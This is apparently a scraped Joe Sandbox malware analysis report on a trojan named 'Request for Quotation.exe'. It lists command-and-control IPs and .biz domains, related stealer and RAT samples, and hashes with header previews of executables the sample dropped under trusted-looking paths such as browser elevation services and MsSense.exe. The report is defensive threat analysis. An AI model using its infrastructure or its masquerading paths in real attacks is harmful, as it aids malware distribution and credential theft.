00000000.00000003.1740158447.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1742733827.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1740677014.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1745556871.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1746541463.0000000000E72000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithelevation_service.exe.0.drfalse
                                		high
                                http://54.244.188.177/Request for Quotation.exe, 00000000.00000003.1737413561.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1745556871.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffelevation_service.exe.0.drfalse
                                    		high
                                    http://18.141.10.107/Request for Quotation.exe, 00000000.00000003.1768862555.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://54.244.188.177/1Request for Quotation.exe, 00000000.00000003.1768862555.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759829685.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1758403499.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1767780343.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      54.244.188.177
                                      		pywolwnvd.bizUnited States
                                      		16509AMAZON-02USfalse
                                      18.141.10.107
                                      		ssbzmoy.bizUnited States
                                      		16509AMAZON-02USfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1572510
                                      Start date and time:2024-12-10 16:39:07 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 48s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:23
                                      Number of new started drivers analysed:3
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Request for Quotation.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.expl.evad.winEXE@17/28@5/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 68%
                                      • Number of executed functions: 76
                                      • Number of non-executed functions: 68
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                      • Excluded domains from analysis (whitelisted): przvgke.biz, ww7.przvgke.biz, zlenh.biz, slscr.update.microsoft.com, otelrules.azureedge.net, knjghuig.biz, vjaxhpbji.biz, ctldl.windowsupdate.com, ifsaia.biz, uhxqin.biz, fe3cr.delivery.mp.microsoft.com, cvgrf.biz, ww99.przvgke.biz, ocsp.digicert.com, lpuegx.biz, saytjshyf.biz, xlfhhhm.biz, vcddkls.biz, npukfztj.biz, anpmnmxo.biz
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: Request for Quotation.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      10:40:06API Interceptor1x Sleep call for process: Request for Quotation.exe modified
                                      10:40:08API Interceptor178386x Sleep call for process: perfhost.exe modified
                                      10:40:29API Interceptor3x Sleep call for process: svchost.exe modified
                                      10:40:44API Interceptor199x Sleep call for process: msdtc.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      54.244.188.177HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                      • cvgrf.biz/hfsfqfqbrwib
                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                      • cvgrf.biz/npdqgsoqmq
                                      RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                      • cvgrf.biz/rtjcy
                                      OgkJOmobY7.exeGet hashmaliciousFormBookBrowse
                                      • pywolwnvd.biz/hemfkj
                                      Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • pywolwnvd.biz/nwqf
                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                      • cvgrf.biz/yqmdwhskkjhif
                                      invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                      • lrxdmhrr.biz/tgcwttfqletfhyq
                                      Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                      • rynmcq.biz/msoqwwrwyts
                                      C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                      • rynmcq.biz/qqnj
                                      PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • pywolwnvd.biz/ksmybghbmbq
                                      18.141.10.107HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                      • vcddkls.biz/ymdlhl
                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                      • knjghuig.biz/jedofahyn
                                      RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                      • vcddkls.biz/gepvpveyhkiwwmj
                                      Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • vcddkls.biz/kf
                                      RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • ssbzmoy.biz/j
                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                      • ssbzmoy.biz/kokmvod
                                      invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                      • acwjcqqv.biz/tgcwttfqletfhyq
                                      Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                      • eufxebus.biz/dw
                                      C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                      • warkcdu.biz/kc
                                      PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • vcddkls.biz/lyroetjkhx

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      fwiwk.bizRFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                      • 172.234.222.143
                                      invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                      • 172.234.222.143
                                      Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                      • 172.234.222.143
                                      C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                      • 172.234.222.138
                                      PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 172.234.222.143
                                      IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                      • 172.234.222.143
                                      AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                      • 172.234.222.138
                                      Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                      • 172.234.222.143
                                      ssbzmoy.bizHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                      • 18.141.10.107
                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                      • 18.141.10.107
                                      RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                      • 18.141.10.107
                                      Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 18.141.10.107
                                      RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 18.141.10.107
                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                      • 18.141.10.107
                                      invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                      • 18.141.10.107
                                      Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                      • 18.141.10.107
                                      C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                      • 18.141.10.107
                                      PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 18.141.10.107
                                      pywolwnvd.bizHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                      • 54.244.188.177
                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                      • 54.244.188.177
                                      RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                      • 54.244.188.177
                                      OgkJOmobY7.exeGet hashmaliciousFormBookBrowse
                                      • 54.244.188.177
                                      Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                      • 54.244.188.177
                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                      • 54.244.188.177
                                      invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                      • 54.244.188.177
                                      Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                      • 54.244.188.177
                                      C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                      • 54.244.188.177

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      AMAZON-02USHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                      • 18.141.10.107
                                      http://abercombie.comGet hashmaliciousUnknownBrowse
                                      • 3.160.188.18
                                      https://d3tl5rwi83n7i8.cloudfront.net/BMGe2dUrJpyz.exeGet hashmaliciousUnknownBrowse
                                      • 13.227.9.131
                                      https://districtwharfoffices.com/l/homeGet hashmaliciousUnknownBrowse
                                      • 3.164.182.25
                                      https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01Get hashmaliciousUnknownBrowse
                                      • 13.227.2.22
                                      https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                      • 108.158.75.129
                                      Product Blueprint..htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 76.223.111.18
                                      xUPaeKk5wQ.msiGet hashmaliciousAteraAgentBrowse
                                      • 13.232.67.198
                                      7gBUqzSN3y.msiGet hashmaliciousAteraAgentBrowse
                                      • 13.232.67.199
                                      MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                      • 13.228.81.39
                                      AMAZON-02USHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                      • 18.141.10.107
                                      http://abercombie.comGet hashmaliciousUnknownBrowse
                                      • 3.160.188.18
                                      https://d3tl5rwi83n7i8.cloudfront.net/BMGe2dUrJpyz.exeGet hashmaliciousUnknownBrowse
                                      • 13.227.9.131
                                      https://districtwharfoffices.com/l/homeGet hashmaliciousUnknownBrowse
                                      • 3.164.182.25
                                      https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01Get hashmaliciousUnknownBrowse
                                      • 13.227.2.22
                                      https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                      • 108.158.75.129
                                      Product Blueprint..htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 76.223.111.18
                                      xUPaeKk5wQ.msiGet hashmaliciousAteraAgentBrowse
                                      • 13.232.67.198
                                      7gBUqzSN3y.msiGet hashmaliciousAteraAgentBrowse
                                      • 13.232.67.199
                                      MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                      • 13.228.81.39

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1658880
                                      Entropy (8bit):4.312984811440721
                                      Encrypted:false
                                      SSDEEP:24576:ixGBcmlnVg9N9JMlDlfjRiVuVsWt5MJMs:qGy+VgFIDRRAubt5M
                                      MD5:68F239C01813FB34CDEBECC73B16EDE9
                                      SHA1:DBA884204162633DA912CF9000EBAA6651EFCA91
                                      SHA-256:B842AB1BFBF29B735BE715C3B31BAD26BAFEC701C386AC39CDF0CB3B02F47B3E
                                      SHA-512:D5430D02FB31BAAEF6ABB721CA04CEA6EE881B16FA39E78836BC3157CED5636C93BF3C366FC0F1884266F47FB915711743A6ECC3FAC67D4DA7EC9D2524731D1D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................>......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):2354176
                                      Entropy (8bit):7.049191490015536
                                      Encrypted:false
                                      SSDEEP:49152:ThDdVrQ95RW0YEHyWQXE/09Val0GPgFIDRRAubt5M:ThHYW+HyWK3Uf
                                      MD5:50E9A4F9451FF8D2C576BF053A02B0D7
                                      SHA1:01AF1F4F0FC6FD23A309400E5CC10D20BBA86747
                                      SHA-256:D40E9935AECB1300FA5E66110F68E93C367C2960EDCE021D5347EDA6C31F6C3F
                                      SHA-512:D4905C9879833EED4ADA46450F5CC4107640EF6558CA92B2C10552F7FE742536D336F46260359812121697D2AA1E6B69D41F2CA8D6776DAFB587E8CF6522D4EC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                      C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                      Download File
                                      Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):3141
                                      Entropy (8bit):4.817156740410215
                                      Encrypted:false
                                      SSDEEP:24:lDEdwDirD9DADZ4DPDBRzDTWtFDqDTWmIFDQ1DKD9DLuDdD7DTWqFDGvDfxDTWlX:6+CRK9mB+R78a5qoBxnqD
                                      MD5:C4386C23BACFA2B7784094B6D17CAE12
                                      SHA1:7F3D19337D452927B7FE1DBF20A65B65108A47DC
                                      SHA-256:A39C9EA8AB490613D3D241899C56DA5DA5C772BD584835C42482EF8311D4220E
                                      SHA-512:6CD91254AA9884651D9159B2FD1AEE4CE5146A8E1D00F128A3613C66B889EC43A6E86169C5BC103E9824918640B5BCDB8B4AA63EA86E6C52764AF6F42AF05FDB
                                      Malicious:false
                                      Preview:2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-10 10:40:07-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-10 10:40:07-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-10 10:40:0

                                      C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1725440
                                      Entropy (8bit):4.412503831257309
                                      Encrypted:false
                                      SSDEEP:24576:kQVTZu0JnVg9N9JMlDlfjRiVuVsWt5MJMs:bVTZumgFIDRRAubt5M
                                      MD5:3F3BEE4315081168FC542419E2F2D1A6
                                      SHA1:D7801E335A26B8183FD340D04E0DB7206D43DE82
                                      SHA-256:BEB100F95D5008A8F2493893EB4080B9B64C0F1EBE12A0644A213E4C301112A4
                                      SHA-512:A1F042BDC7CFE37E9EA8ABE1E9394CCB11A34644285C2FABB5D71688D853FC250604948CB2204E9F9ED3F44AF730C70E29E8A183C9AB1C8E0C3981ED6D9C9940
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@....................................2,.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...............t..............@...........................................................................................................................................................................................................................

                                      C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):2370560
                                      Entropy (8bit):7.031534525044303
                                      Encrypted:false
                                      SSDEEP:49152:RAMsOu3JfCIGnZuTodRFYKBrFDbWpBgFIDRRAubt5M:RAMa38ZuTSzUf
                                      MD5:3E95F175A0243E5401D22AE69D9D681C
                                      SHA1:5898351AB7FDBE9B9ACF83DCDDB117034799D5EE
                                      SHA-256:34B14B2B411586CBE1102F9EFBF06FB1B081B498A410AA6A8158F73957553115
                                      SHA-512:B830759971D3C89AC40CCB7B34B90AB270DFB4EE27A16FF08C9F730B266AA47AC3A57DF6BECC6823CECA2C9DD428D7848E0111B63714F3C41A840C1A12127E47
                                      Malicious:true
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.....L.$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                      C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1710592
                                      Entropy (8bit):4.310738880324589
                                      Encrypted:false
                                      SSDEEP:24576:Ef8HQl9MxHwJ07wEVg9N9JMlDlfjRiVuVsWt5MJMs:EkHQlYwJ01gFIDRRAubt5M
                                      MD5:98F9ADB0B46A5E405062C81E0D2ED96D
                                      SHA1:583A0E4D680A0C4A38AF93323554C93AD736D517
                                      SHA-256:C9C97076F4560DE548287BB34E1A769789DD562ECA4E425441D78F3800267F8E
                                      SHA-512:A97F551926BBF7240B432B6B4FDD1D6DC83024B0BDF52BF89FDD29B9407D39C7062F9115BC0F79DC24486F3FEECE1ABC42CAD9D757923F7E9939BC81D3ADF18B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.............................p......@..... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...............:..............@...................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\aut4FCF.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):289280
                                      Entropy (8bit):7.995655378638414
                                      Encrypted:true
                                      SSDEEP:6144:Hy4uUHLoooA6tLUmemiVZLBSLPDDIVtdbKPg53sy:HyMX6tLqTSHDIBB5V
                                      MD5:9B64BD4C4C4C1E2AF631B9D0785F0E31
                                      SHA1:DCC3811E3B2B85D3CC2857D94A04F7CD7A87479C
                                      SHA-256:AFEC7CAEEA82EE22D62B30C6A3EAC9375716BC03BF059C5C51603441B15B6765
                                      SHA-512:FB19A93FB5E44BD0313E89F375A87B9EEE000E889F37140350853C4526989C65D4404AFFEB6D35D2BB249602CEECAF33371AB2A968E3997E6C749A3F4CCD3DFB
                                      Malicious:false
                                      Preview:...IH7JE2KRB.2A.H2YDZC8sHPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CP.IK7DZ.ER.8...I..x.2*K.8"*Q117i(V$+Y?r Ty@4&h[7d..k.%?!Sm]WCo7JE6KRBHX;.u(U.y:$..(7.,...s+P._..~Q>.[...e$=.jZ+8xV$.ZIK7JE6K..1Y~@IH./..C83HPE6C.ZKJ<KN6K.F1Y2AHH2YD.W83H@E6C ^IK7.E6[RB1[2ANH2YDZC85HPE6CPZI;3JE4KRB1Y2CH..YDJC8#HPE6SPZYK7JE6KBB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83H~1S;$ZIKC.A6KBB1YjEHH"YDZC83HPE6CPZIk7J%6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y2AHH2YDZC83HPE6CPZIK7JE6KRB1Y

                                      C:\Users\user\AppData\Local\Temp\phytographical

                                      Download File
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):289280
                                      Entropy (8bit):7.995655378638414
                                      Encrypted:true
                                      SSDEEP:6144:Hy4uUHLoooA6tLUmemiVZLBSLPDDIVtdbKPg53sy:HyMX6tLqTSHDIBB5V
                                      MD5:9B64BD4C4C4C1E2AF631B9D0785F0E31
                                      SHA1:DCC3811E3B2B85D3CC2857D94A04F7CD7A87479C
                                      SHA-256:AFEC7CAEEA82EE22D62B30C6A3EAC9375716BC03BF059C5C51603441B15B6765
                                      SHA-512:FB19A93FB5E44BD0313E89F375A87B9EEE000E889F37140350853C4526989C65D4404AFFEB6D35D2BB249602CEECAF33371AB2A968E3997E6C749A3F4CCD3DFB
                                      Malicious:false
